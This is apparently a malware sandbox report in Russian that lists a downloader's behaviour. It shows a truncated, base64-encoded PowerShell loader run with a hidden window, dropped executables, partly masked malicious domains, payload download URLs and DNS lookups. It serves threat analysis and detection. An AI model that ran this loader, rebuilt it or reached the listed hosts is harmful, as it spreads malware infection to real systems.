Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
- %TEMP%\1291563.cvr
- %HOMEPATH%\774.exe
- %HOMEPATH%\774.exe
- 'mi####alqasim.com':80
- 'mi####alqasim.com':443
- 'wo####leetbd.com':80
- 'se####typoint.com':80
- http://mi####alqasim.com/oldSite/pXf0117/
- http://www.wo####leetbd.com/websiteguide/pnGM26908/
- http://wo####leetbd.com/websiteguide/pnGM26908/
- http://se####typoint.com/news/eOjV/
- 'mi####alqasim.com':443
- DNS ASK cr###ectric.com
- DNS ASK mi####alqasim.com
- DNS ASK wo####leetbd.com
- DNS ASK se####typoint.com
- DNS ASK tr######rantydelivery.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF... (со скрытым окном)